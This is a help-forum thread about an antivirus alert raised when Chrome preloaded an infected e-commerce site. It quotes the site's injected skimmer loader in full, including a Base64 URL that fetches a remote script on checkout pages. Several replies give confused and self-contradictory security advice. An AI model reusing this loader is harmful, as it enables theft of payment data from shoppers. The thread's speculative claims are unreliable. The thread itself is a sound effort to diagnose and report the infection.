HEUR:Trojan-PSW.Script.Generic from Google Chrome Preloading Webpages.

[MoonCelt]

Hello,

Could someone assist me with my Issue.

When I was using Google Chrome search in incognito, I forgot to remove the preload option in Google Chrome Settings.

Kaspersky blocked something from the preload which is HEUR:Trojan-PSW.Script.Generic. 
Upon checking the MD5 file seems to be changing every time it shows up on the search results and gets preloaded by Google Chrome. All downloads are said to be blocked by Kaspersky.

Event: Download denied
User: Jayce/Marke11
User type: Initiator
Application name: chrome.exe
Application path: C:\Program Files\Google\Chrome\Application
Component: Safe Browsing
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic analysis
Threat level: High
Object type: File
Object path: https://emersonknives.com
MD5 of an object: EE292C799BA6A8D346A3B0439F4263DA
Reason: Expert analysis
Databases release date: Today, 11/26/2024 5:59:00 PM

==

Event: Malicious object detected
User: Jayce/Marke11
User type: Initiator
Application name: chrome.exe
Application path: C:\Program Files\Google\Chrome\Application
Component: Safe Browsing
Result description: Detected
Type: Trojan
Name: HEUR:Trojan-PSW.Script.Generic
Precision: Heuristic analysis
Threat level: High
Object type: File
Object path: https://emersonknives.com
MD5 of an object: EE292C799BA6A8D346A3B0439F4263DA
Reason: Expert analysis
Databases release date: Today, 11/26/2024 5:59:00 PM

Virus Total and Open Tip show nothing.

https://www.virustotal.com/gui/url/0f05f2a96bec7b07511ec309027cfaa2610b27edff63ecc970dc1099ddfb92fb
https://opentip.kaspersky.com/https%3A%2F%2Femersonknives.com%2F/?tab=lookup

I do not wish to open the website or preload it again via Google Chrome Search and have no backup of the file for the site or Hash file.
Is my machine safe, do I need to do anything?

Assistance will be appreciated.

Thank you.

[Berny]

@MoonCelt Welcome.

33 minutes ago, MoonCelt said:

Is my machine safe, do I need to do anything?

Kaspersky blocked the download before it reached your machine , you don't need to take any action.
In the meantime i submitted this detection to Kaspersky Virus Lab, the verdict will be provided when available.

[harlan4096]

About that URL detected:

Quote

Hello,

This is not a false alarm. This site is infected.
Here is the malicious code:

!function(t,e){var c=t.currentScript;if(c&&c.parentNode.removeChild(c),location.href.match(/checkout/)&&!("10378c24fd7924fa"in e)){var a=t.createElement("script");a.setAttribute("src",e.atob("aHR0....

If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

Best regards, Malware Analyst

So, probably Your Chrome is infected, check the add-ons, do a Chrome reset settings.

 

Do you get the same detection if You try with Mozilla FireFox?

[MoonCelt]

Hello,

Thank you both for your assistance.

9 hours ago, harlan4096 said:

About that URL detected:

So, probably Your Chrome is infected, check the add-ons, do a Chrome reset settings.

 

Do you get the same detection if You try with Mozilla FireFox?

This is unfortunate to hear. I do not use Firefox therefore I wasn’t able to check.

I might opt for a fresh windows reinstall for peace of mind. I will make sure to have preload on my browsers off this time around.

Cheers.

Edited November 27 by MoonCelt

[harlan4096]

Alternatively, You can run AdwCleaner:

 

https://www.malwarebytes.com/adwcleaner

 

And check if some was installed inside Your browsers, copy/paste here the result of the scan.

[KarDip]

Hello @MoonCelt

Also Thank you  Moderator harlan4096 for providing the malicious code.

Based on the snippet, here’s an analysis of its structure and intent, as well as actions you should take to ensure safety.

---

Malicious Code Analysis

Observed Behavior:

1. Dynamic Script Injection:

   • The code targets the current script (t.currentScript) and removes it (c.parentNode.removeChild(c)), likely to obfuscate its source and reduce traceability.

2. Targeted Trigger:

   • It checks if the URL contains the string checkout (location.href.match(/checkout/)). This indicates it targets e-commerce sites, possibly aiming to steal payment information during transactions.

3. Suspicious Key/Flag:

   • The code checks for "10378c24fd7924fa" in the window object ("10378c24fd7924fa" in e). If not present, it proceeds to load a secondary script.

4. Obfuscated Secondary Script:

   • A new script is created (t.createElement("script")) and its source is set using a Base64-decoded URL (e.atob(...)), making it harder to detect or analyze without decoding.

Likely Intent:

• The code suggests credential theft or skimming, especially targeting checkout pages.
• It may load additional malicious payloads from the Base64-decoded URL.

---

Recommendations for Webmasters

If you manage the site or are in contact with its administrators:

1. Remove the Malicious Code:

   • Identify all instances of this code on the website (e.g., embedded scripts, injected files) and remove them immediately.

2. Scan for Backdoors:

   • Use tools like Wordfence (if the site is WordPress-based) or a server-level malware scanner to detect unauthorized access points.

3. Change Credentials:

   • Update passwords for:
     • Hosting account.
     • CMS admin panel.
     • FTP/SFTP accounts.
     • Database and any APIs linked to the site.

4. Review Recent Changes:

   • Check logs for unauthorized file modifications or uploads.
   • Pay special attention to scripts or pages recently edited.

5. Secure the Website:

   • Update all CMS, plugins, and extensions to the latest versions.
   • Implement a Web Application Firewall (WAF) for ongoing protection.

---

Recommendations for Users

If you’re accessing the site as a visitor or suspect exposure to malicious content:

1. Ensure Your System is Safe:

   • Kaspersky blocked the threat, but run a full scan to confirm no traces remain.

2. Check for Suspicious Browser Behavior:

   • Look for unexpected redirects, pop-ups, or unauthorized browser extensions.

3. Avoid the Website:

   • Block the domain in your Kaspersky settings or host file.

4. Monitor Your Financial Activity:

   • If you interacted with the site’s checkout page, monitor your bank statements for unusual transactions.

---

For Further Action

• Decode the Payload:

  • The secondary script’s source is Base64-encoded (e.atob(...)). If you provide the full encoded string, I can decode and analyze its behavior for a deeper understanding of the threat.

• Report the Site:

  • Notify Kaspersky and relevant authorities (e.g., Google Safe Browsing) to help flag the site as malicious and warn other users.

Let me know if you need assistance decoding the Base64 or further investigating!

Thank you

[MoonCelt]

Hello, 

Thank you for this in depth view.

I never interacted with the website aside from google chrome preloading it on the search results, Full scan of Kaspersky did not show any detections. Logout accounts and removed any active sessions/cookies.

I decided to reinstall windows 11 today as it was also due for a fresh reinstall. This step should technically wipe any threat as well from the previous install right?

I will report it to google safe search as per recommendation.

Cheers.

 

Edited November 27 by MoonCelt

[Berny]

@MoonCelt Hello,

↓ Only for your information ↓

Spoiler

No detection from Kaspersky and AdwCleaner ....

[MoonCelt]

On 11/27/2024 at 3:39 PM, KarDip said:

 Further Action

• Decode the Payload:

  • The secondary script’s source is Base64-encoded (e.atob(...)). If you provide the full encoded string, I can decode and analyze its behavior for a deeper understanding of the threat.

• Report the Site:

  • Notify Kaspersky and relevant authorities (e.g., Google Safe Browsing) to help flag the site as malicious and warn other users.

Let me know if you need assistance decoding the Base64 or further investigating!

Thank you

Hello @KarDip,

 

Attached is the full snippet of the offending code along with the Base64. Could you assist to decode it and share what it does?

Apologies for only being able to use photos for it as I accessed it on a locked/isolated machine.

On 11/27/2024 at 4:37 PM, Berny said:

@MoonCelt Hello,

↓ Only for your information ↓

  Reveal hidden contents

No detection from Kaspersky and AdwCleaner ....

Hello @Berny,

This is fantastic news, thank you for sharing me the results for ADWcleaner as well.

Regards,

MoonCelt

Edited December 4 by MoonCelt

[KarDip]

@MoonCelt

I cannot decode photos.

The image appears to be a screenshot of a code editor or IDE (Integrated Development Environment). It shows a section of code written in what looks like JavaScript or a similar programming language.

The code snippet includes various programming constructs such as variable declarations, function calls, and object properties. However, without more context, I cannot provide a detailed explanation of the code's purpose or functionality.

Suggest you send Kaspersky Technical Support to analyse. 

[MoonCelt]

Hello @KarDip

Would you be able to proceed with decodedification with below complete script?

Complete with base64 as per below.

On 11/27/2024 at 3:22 AM, harlan4096 said:

!function(t,e){var c=t.currentScript;if(c&&c.parentNode.removeChild(c),location.href.match(/checkout/)&&!("10378c24fd7924fa"in e)){var a = t.createElement("script");
a.setAttribute(“src”, e.atob("aHR0cHM6Ly9mbGV4LXF1ZXJ5LmNvbS9zdGF0aWMvMTAzNzhjMjRmZDc5MjRmYS9qcXVlcnkuanM=") + “?t=“ Date+now()),
t. head-appendChild(a)
}

Apologies again and hoping for your assistance.

Thank you

MoonCelt

[KarDip]

@MoonCelt

Copy past script provided  by MoonCelt

!function(t,e){var c=t.currentScript;if(c&&c.parentNode.removeChild(c),location.href.match(/checkout/)&&!("10378c24fd7924fa"in e)){var a = t.createElement("script");

The two code snippets you’ve shared to me appear to be closely related.

It is possible these two Scrips you found might have worked together?

Also maybe you can fix it this way with Luck don't blink.

Here’s a deeper look.

Let me try and break it down for you:

Also I am not responsible if you attempt this in the future-you do at you own risk.

How They maybe Connect:

1. First Part (!function(t,e){...}😞
   • This is an Immediately Invoked Function Expression (IIFE), a common pattern used in JavaScript to execute a function as soon as it's defined.
   • t.currentScript gets the current script element (the one running the code). It then removes this script from the DOM to potentially cover the tracks of the malicious code.
   • location.href.match(/checkout/) checks if the current page is part of a checkout process (common in e-commerce sites). This suggests the script only runs during the checkout phase.
   • !("10378c24fd7924fa" in e) ensures that the script only runs once, preventing re-execution by checking the absence of a specific key in the e object.
2. Second Part (Decoding and Loading the Malicious Script):
   • The script decodes a Base64-encoded string into the URL-removed hyperlink. This is the location of the malicious script being fetched.
   • t.head-appendChild(a) appends the new script to the HTML <head> section, causing it to be executed.

Implications of This Code:

• Evasion Tactics: The script attempts to avoid detection by removing itself after execution, possibly to cover its tracks. It also only executes on specific pages (like checkout), which suggests it’s targeting sensitive user activity.

• Malicious Payload: The second part of the script (the one fetching the remote file) suggests that this is part of a larger, more sophisticated malware payload. The malicious script could be used for tracking, stealing credit card information, injecting additional malware, or even manipulating the checkout process itself.

What You Should Do:

1. Check Browser and Extensions: The malicious script might have been injected into your browser. Review your browser’s extensions and disable or remove any that seem suspicious. Clear your browser's cache and cookies to ensure no leftover malicious data.

2. Scan with Antivirus: Run a thorough system scan using your antivirus (like Kaspersky) to ensure there are no residual threats or other forms of malware.

3. Monitor Your Accounts: If you accessed any online stores or entered payment information during this time, monitor your bank and credit card statements for any unauthorized transactions. Consider using services like credit monitoring or fraud alerts.

4. Review Security Logs: If this infection was part of a larger network issue, you might want to review security logs or consult with an IT professional to identify any other vulnerabilities.

I think you done reinstall if not >>If this seems particularly complex or difficult to handle, it might be a good idea to perform a full OS reinstall to ensure that all traces of the malware are removed.

==========================================================================================================================================================================

@MoonCelt

a.setAttribute(“src”, e.atob("aHR0cHM6Ly9mbGV4LXF1ZXJ5LmNvbS9zdGF0aWMvMTAzNzhjMjRmZDc5MjRmYS9qcXVlcnkuanM=") + “?t=“ Date+now()), t. head-appendChild(a) }

It seems like the code you found on your computer might be related to a potential malware infection or malicious script.

Also maybe you can fix it this way with Luck don't blink twice,

Let me try and break it down for you:

Also I am not responsible if you attempt this in the future-you do at your own risk.

Breakdown of the Code:

1. location.href.match(/checkout/): This part checks if the current URL contains the word "checkout." This could indicate the script is trying to execute only during the checkout process of an online store or a similar web page.

2. !('10378c24fd7924fa' in e): This condition checks whether a specific key (likely related to a tracking or security identifier) is not in the object e, indicating that the script hasn't run before or doesn't have a particular flag.

3. var a = t.createElement("script");: Creates a new script element in the document.

4. a.setAttribute("src", e.atob("aHR0cHM6Ly9mbGV4LXF1ZXJ5LmNvbS9zdGF0aWMvMTAzNzhjMjRmZDc5MjRmYS9qcXVlcnkuanM=")): This decodes a Base64 string, which results in the URL hyperlink removed. This indicates that the script is attempting to load a malicious JavaScript file from this URL.

5. t.head-appendChild(a): This appends the new script element to the head of the document, effectively executing the malicious script.

What this means:

• Malicious Activity: The script is attempting to load and execute a remote JavaScript file from a suspicious domain (flex-query.com). This file could be a form of malware designed to perform various malicious activities, such as tracking, data collection, or even injecting further harmful code.

• Potential Data Theft: If the script was allowed to run, it could compromise sensitive information such as credit card details, login credentials, or other personal data from the user.

Next Steps:

• Remove the Infection: If your computer was infected, it's crucial to ensure that the malicious script has been fully removed. You can use a trusted antivirus tool (like Kaspersky) to run a deep scan of your system.

• Clear Browser Cache: Malicious scripts can sometimes be injected into your browser cache or extensions. Clear your browser's cache and check for any suspicious extensions or add-ons.

• Check Startup Programs: Ensure there are no malicious programs set to run at startup. You can check this in Windows through Task Manager > Startup or using specialized software like Autoruns.

• Reinstall Security Software: Make sure your antivirus or security software is up to date, and consider reinstalling it to ensure all components are functioning properly.

• Monitor for Suspicious Activity: Keep an eye on any unusual behavior on your system, such as unexpected pop-ups, slow performance, or strange network activity.

If you have further concerns or need help investigating deeper, feel free to reach out.

Edited December 5 by KarDip
removed hyperlink

[MoonCelt]

Hello @KarDip,

It seems the said offending code has been removed from Emerson knives today.

Would it be okay to know what the .js file does? Could it be a RAT?

Is it possible to try execute the .js file by accessing the .js file link? Or does it need to be run on console?

Please also remove the hyperlink so others won’t click it by mistake.

You think full reinstall fresh with secure erase would be enough? 

Really sorry about the continued questions.

Thank you very much.

MoonCelt

Edited December 5 by MoonCelt

[MoonCelt]

To clarify my questions in above post since I seem to have worded them a bit wrong and I cannot edit anymore.

1. Would it be possible to know what the .js file does? Could it possibly a RAT?

2. Is it possible to run the .js file just by opening the .js file link on a browser? Or does it need to be run on the console as a script?

3. Would a full fresh reinstall be enough in this case to be safe? Also zero flushing the drives via secure erase and disk part.

My additional concerns:

1. Is this .js file possibly the file that Kaspersky blocked initially? I do not have picture of it but please see photo below from Berny.

On 11/27/2024 at 4:37 PM, Berny said:

@MoonCelt

  Reveal hidden contents

No detection from Kaspersky and AdwCleaner ....

Thank you very much.

MoonCelt

[KarDip]

@MoonCelt

I'll address each of your concerns based on the information you provided:

1. What does the .js file do? Could it possibly be a RAT?

A .js file is a JavaScript file, and while JavaScript itself is typically used for legitimate purposes like web interactivity, it can be exploited to perform malicious actions. Whether it is a Remote Access Trojan (RAT) or something else depends on the code within the .js file. A RAT allows an attacker to remotely control a system, steal data, or perform malicious actions without the user’s knowledge.

If the .js file contains malicious code, it could potentially exploit vulnerabilities to download and execute a RAT or other types of malware. Without seeing the actual contents of the .js file, it’s difficult to say definitively, but if Kaspersky blocked it, there’s a possibility it was flagged as malicious, which would support this idea.

2. Is it possible to run the .js file just by opening the .js file link on a browser? Or does it need to be run on the console as a script?

Yes, a .js file can run automatically in a browser if linked to from a website. However, this depends on how the file is served and whether it’s executed via a malicious website, or included in an HTML document to run when the page loads.

• If it’s a standalone .js file, it typically won’t run just by clicking the link unless there’s a specific mechanism to execute it (such as if it's embedded in a webpage).
• If it’s embedded within an HTML page or loaded as part of a larger malicious payload, just visiting the webpage could trigger the execution of the script, which could lead to further exploits (e.g., via drive-by download attacks).
• To run the .js file manually, you’d need to open it in the browser’s developer tools (Console), or execute it in a local environment like Node.js. If it’s embedded in a webpage, it could run without any user interaction beyond visiting the page.

3. Would a full fresh reinstall be enough to be safe? Also, zero flushing the drives via secure erase and disk part?

A full reinstall can be an effective way to remove persistent threats, but it depends on the type of attack and how deeply the malware has infected the system.

• Fresh reinstall: This can clean up most issues, but if the malware has embedded itself in system firmware (e.g., UEFI/BIOS rootkits), a reinstall alone won’t be sufficient.

• Zero-flushing drives / secure erase: If you suspect that your system has been severely compromised, wiping the drives with a secure erase will make sure no residual data remains. You can use disk partitioning tools like DiskPart or third-party tools like DBAN for this. This step ensures that even deeply embedded malware is removed.

If you do a full wipe, you’ll need to reinstall Windows (or your OS) and all software from trusted sources. Afterward, ensure your antivirus is up to date and runs a full scan to check for any remaining threats.

Additional Concerns:

It's harder to know for sure, but if Kaspersky did block the file, it likely considered it not  suspicious. The lack of detection from AdwCleaner suggests that it could have been a more sophisticated threat (like a RAT or other stealthy malware) that didn't present itself in typical ways.

Given that no detection was reported by both Kaspersky and AdwCleaner, I would suggest:

• Double-checking Kaspersky logs for details about the blocked file. It might give you more information about what was flagged.
• Running a more comprehensive malware scan using tools like Malwarebytes, HitmanPro, or KVRT to ensure all potential threats are addressed.

If you’re still unsure, it’s best to proceed cautiously with a full system cleanup (fresh install + secure erase) and monitoring any suspicious activities after that.

The End